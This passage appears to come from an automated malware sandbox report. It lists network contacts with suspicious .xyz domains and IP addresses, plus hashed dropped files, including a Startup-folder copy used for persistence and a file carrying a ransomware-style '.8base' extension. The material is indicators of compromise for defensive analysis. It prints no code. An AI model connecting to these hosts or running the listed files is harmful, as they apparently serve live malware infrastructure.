US 8.8.8.8:53 210.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 dexstat255.xyz udp
DE 185.234.72.142:46578 dexstat255.xyz tcp
US 8.8.8.8:53 142.72.234.185.in-addr.arpa udp
US 8.8.8.8:53 fexstat27.xyz udp
DE 5.182.207.8:80 fexstat27.xyz tcp
US 8.8.8.8:53 8.207.182.5.in-addr.arpa udp
US 20.42.73.25:443 tcp
US 8.8.8.8:53 serverlogs37.xyz udp
US 8.8.8.8:53 servblog757.xyz udp
DE 45.89.127.159:80 servblog757.xyz tcp
IT 179.43.162.58:80 179.43.162.58 tcp
US 8.8.8.8:53 dexsel29.xyz udp
EE 159.253.18.136:80 dexsel29.xyz tcp
US 8.8.8.8:53 159.127.89.45.in-addr.arpa udp
US 8.8.8.8:53 58.162.43.179.in-addr.arpa udp
US 8.8.8.8:53 136.18.253.159.in-addr.arpa udp
NL 145.14.157.71:80 145.14.157.71 tcp
US 8.8.8.8:53 71.157.14.145.in-addr.arpa udp
US 8.8.8.8:53 45.8.109.52.in-addr.arpa udp
DE 45.89.127.159:80 servblog757.xyz tcp
NL 178.79.208.1:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdfjcnn0.tct.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe

MD5 a780dd7a5ed788b79d157339f69bbad4
SHA1 7e10cd37e03420947d45c0374b05f23e058731e9
SHA256 78ad9e5dbc080327aa2b725b3278a9c53c85099ba86807b7943f11da1127c778
SHA512 e8da669acd35969e767fe475b387495122dfc6f208636a648a9213a1e7b7891d6e64ba2260d0a018f0e4f4d94f67ce126b8006795062837dff88f93a56b469dd

C:\Users\Admin\AppData\Local\Temp\s777mx.exe

MD5 8d7ebe871589d79f195f240dcef43a57
SHA1 f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256 19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512 244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

C:\Users\Admin\AppData\Local\Temp\3C2E.exe

MD5 4ee88295d65b7a6e566d200a1c842801
SHA1 5dfb320e933425cea8188f8f7dab346796c3b090
SHA256 b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512 caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

C:\Users\Admin\AppData\Local\Temp\3EBF.exe

MD5 8a62691e9921ee88ab036aba6f9e45eb
SHA1 288d8268254bf799aef8db58beb18cb35fd903a1
SHA256 a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5
SHA512 75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44

C:\Users\Admin\AppData\Local\Temp\42D7.exe

MD5 8d7ebe871589d79f195f240dcef43a57
SHA1 f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256 19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512 244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

C:\Users\Admin\AppData\Local\Temp\547C.exe

MD5 6992433acbb1398c0b539d1cafdf47c4
SHA1 6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256 5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512 2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll

MD5 5f449db8083ca4060253a0b4f40ff8ae
SHA1 2b77b8c86fda7cd13d133c93370ff302cd08674b
SHA256 7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1
SHA512 4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\3EBF.exe

MD5 8a62691e9921ee88ab036aba6f9e45eb
SHA1 288d8268254bf799aef8db58beb18cb35fd903a1
SHA256 a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5
SHA512 75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id[CF072F13-3483].[[email protected]].8base

MD5 4be32a0a4eabdf02dffc15ff149a189a
SHA1 5391390845c9f728a42809d547fafe8aa794e2aa
SHA256 abc142eacf656930c30c7c0610952a0dbd57f44f60bcf642b5141fd628fef99d
SHA512 1996aab5b64d44c0e784365ab587fb5cfb510a2b543c9f7b495579f70031f671933b6d085cb94ef13f07c72d67a349b684b4a528829ccd69f854509e7c07c4a8

C:\Users\Admin\AppData\Local\Temp\sv.bat

MD5 ca039530887fa8dce08b07808582c4c7
SHA1 15b27c115ecf430bb3adccba408e6cdd6b94945c
SHA256 567b3fbd05b70248c6961e4cf5fc0196ae3f84d190402ca0d72e849007baf393
SHA512 9e7c3f51791c4c6aaa745622ae698cec04a75cbc716b267b4f258d599f56befab3d7142e2ce6dcac4d46d444fe2225c987ba1662788e47c39eb8538b7ab050d8

C:\Users\Admin\AppData\Local\Temp\SRD.bat

MD5 809325b0bf02d5f44ce3d005b018cc12
SHA1 c39206a6b0e5dfaf5d4a50c5887b8400d55eda87
SHA256 136c478f4bd8baf478b13a43d31d62d69669c40453ca3fe81ddfebe2ff6ab0c4
SHA512 a8b1ee15056f625ebe89a9968b2820c7bad7fc76197f705d785ecee78fbe93355cae2d784cadfdf68fc23533ab2bc8e3bd67de9e1bba07b1c4f5d6c3529a7473

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 3337d66209faa998d52d781d0ff2d804
SHA1 6594b85a70f998f79f43cdf1ca56137997534156
SHA256 9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd
SHA512 8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 34d461b8b826e81426975ca16787672f
SHA1 82737839fcf9e0f0eca8a879035ea512fd2edaa4
SHA256 45f4b6bf317f54ca9f783d88793ffd40ea9b43f3d89ac3d4c494031945a03705
SHA512 1891e62ecff1cc6b96b9834358a07dd33818e8f4f42f67967fdc72da5cf68df6bb8d7ac26e1401aef51af480514e7ee5582cc0af7abfbc879597ffc2e8d6f89e

C:\Users\Admin\AppData\Local\FallbackBuffer\iyvewvp\PublicKey.exe

MD5 4ee88295d65b7a6e566d200a1c842801
SHA1 5dfb320e933425cea8188f8f7dab346796c3b090
SHA256 b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512 caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 05485a4a4a5bf5010ecfaacfbded0e59
SHA1 06791a9950fc9b36f508c03d170152708f749efd
SHA256 cf7243dfd9c76a26c03b2d267ddd762a73b96e3dbd1d32515c9a00f276406d13
SHA512 b526bc16f39d884a87782da55392f5c2e763d313928e84e338a0052c33345c1beab609c364f66db90e7e7acdde1bfa601a1d816084adee5745afba7b319bd429

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 bf0a14f208d096d00509ceeb270c4be6
SHA1 182d7e4a6e1996a85a12f49fcfd1cc0f5f00495d
SHA256 1e32e5c0ffd9fb6acabd829589044d5735e55f8464a14788ba59ae5c50f3bb31
SHA512 a3224238dfde7d20ad703e84b0c0e0f7dc6bfc007dee7a1dc469537b57d4ae1ef2ac81e33a537f929cce053f5022da2a85fe2143b22bdb32914e17f046184d1b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8a51d636f6d2d422ce072fe927aacbe3
SHA1 161a11fff5e9bebcb6a7a0263c6e7a18274a5209
SHA256 d5bc50684315205c5c745348d39cff2351d0e6bf2e79774bd35c7732465876a9
SHA512 8426fcf1edf5b3f49ad32825e455bb5580caf65ce8ee01b16c8410d56e31cc3e9dce19178fa89e3a921e35838552a53f1e0cf29b3e16cbc99c0600e9327262d2